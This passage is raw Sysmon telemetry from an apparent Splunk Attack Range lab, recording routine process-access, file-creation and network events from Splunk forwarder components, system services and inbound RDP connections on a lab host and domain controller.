09:16:37.454{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8BF5-6151-E979-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979827Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BF5-6151-E979-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979826Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.439{69CF5F33-8BF5-6151-E979-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979825Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.047{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0CFF8903471C1B9A3DFCBC36C6976FB,SHA256=379E4BE938BF208FF3088C52A29BDBAF6177CAB80CCEFECDE21793B2A0607E4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979840Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:38.532{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9FABE921F5F45874012CD9E656487386,SHA256=E5AE135A4474DB75F0F4FE18F0FD16B6BCF6964A03D2AA9EC6F38B81C390A05B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979839Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:38.266{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D92971F837D54DB66E6BD9D6E603552F,SHA256=47055951131C2177FAFCED0BA3CD76A60D2D8F4DFA7678F495AB7CAB00968C12,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:36.426{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53437-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001051162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:38.439{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4312MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:38.144{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B12A18C53C94D06C9290DC397499B928,SHA256=E25F80DF6DAC1BEFF070A8EF26CFBAFB33C8E5B155542BFA85546D39920A7E41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979843Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:36.896{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65407-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979842Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:39.579{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15771F096DA32C3960805B057B7060FD,SHA256=1572C7CAADDDA121F62D0FEAF2949F0768B04371E71F95B9A72CAD26ACD0EB0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979841Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:39.407{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE0325AB9E58CE98E40E97115079DA5D,SHA256=F0523860248B9D2D41CEFAB72753A4B27C9004F6F7F96875885F906203B598D9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:37.936{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53438-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:39.439{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4313MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:39.316{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=ADE2DCDAFCFBD7C1A27BF07FBF99CBA9,SHA256=56179ABB8CC631C5FB42B419C56E7B4B659D0B4DFDA75AA35A90CD6E0EA04CF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:39.161{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9A588B2962F6E1C1199D5A0A666B74D,SHA256=DDA57FF9732C04B59B6702A28A514985BC4B465B10799E9980C7EB180163E77E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:40.377{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA23E102D300BC23AD4F5F6EAE1B4D38,SHA256=41E5E8D6A19FEE45DF88252A22190ED80339AEBF628537F2CB95C1D4A1BEFA2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979844Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:40.407{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B4812D6457A6252844B451B6A2159AB,SHA256=C878AEE1EEBC5F0AA040D1819542B8EC2371269CA5A3ADEB9CA3146C9497138B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979846Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:38.844{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59442-false10.0.1.12-8000- 23542300x8000000000000000979845Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:41.422{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=580569CBBB8CA64F13F48478F84E4476,SHA256=EE97F7D6CF549EFAB4C363EF2D9409445DC4A93112562AF602772F6676D3338B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:41.383{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F62469460F483CEA5598F1740BAE76A9,SHA256=5BE9A86F5D0D3B6A409EA457B57B839300244C18894638226A5C939FF9EF79EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979847Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:42.438{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=076608305888FB671FA595204C4970D9,SHA256=CB4C3100AD32D93EF7089E147C732E8A131140AA34F293174B8CF83B96FA223B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:42.890{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4AA033BB7FA606362EB3D487EF7CDF36,SHA256=9EA962CC16C5F197D068EB568B7841B81394E034BE2D34668D8226AE911B55C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:42.888{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3488E72726F7E433DC1C5062674F0BD,SHA256=D930B63C386A5FFAA28A0B2826CE17405030D6F6A2B4B8E3703E44A405C41C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:42.391{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D46ACA775201C1D69CB1CAC3BC0E1849,SHA256=2A9D77FE5135F1F15A34B0A9DEA78986697BE4FD03B2838ADB1BB264A13F60CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979848Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:43.443{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB28D25B05096A0B2EED5D65D3A0E7BA,SHA256=DB6D748AF03988FC4356365FA0335BC25F5A3BDC69A8FE4E1E9B7576FD76CBDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:41.202{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52452-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:43.400{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5A663D53F14B67EA32CFCF32776E960,SHA256=90A5879C5D6BF205B571F4EA1A92C58AE9109C4929DE1629CB0D228744DAE270,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.691{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BFC-6151-557A-00000000FC01}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.689{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.689{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.689{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.687{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.687{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8BFC-6151-557A-00000000FC01}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.687{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BFC-6151-557A-00000000FC01}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.660{5EBD8912-8BFC-6151-557A-00000000FC01}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:42.497{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53873-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.406{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF4A463C5E808D13B29475F6911DE54,SHA256=F573EBD83F650CCEA157D0ED013F12947376CA4DE8675DF2F28E090470159FD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.404{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.404{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979849Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:44.458{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=950D80E68D43EB1556807CFAB3221ED7,SHA256=AE3A6392E85F60FD9CDBA31E00ED8AA9A2C6D9E937731B803117F6A5BA7DDC94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:44.142{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4AA033BB7FA606362EB3D487EF7CDF36,SHA256=9EA962CC16C5F197D068EB568B7841B81394E034BE2D34668D8226AE911B55C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.911{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BFD-6151-577A-00000000FC01}5564C:\Program 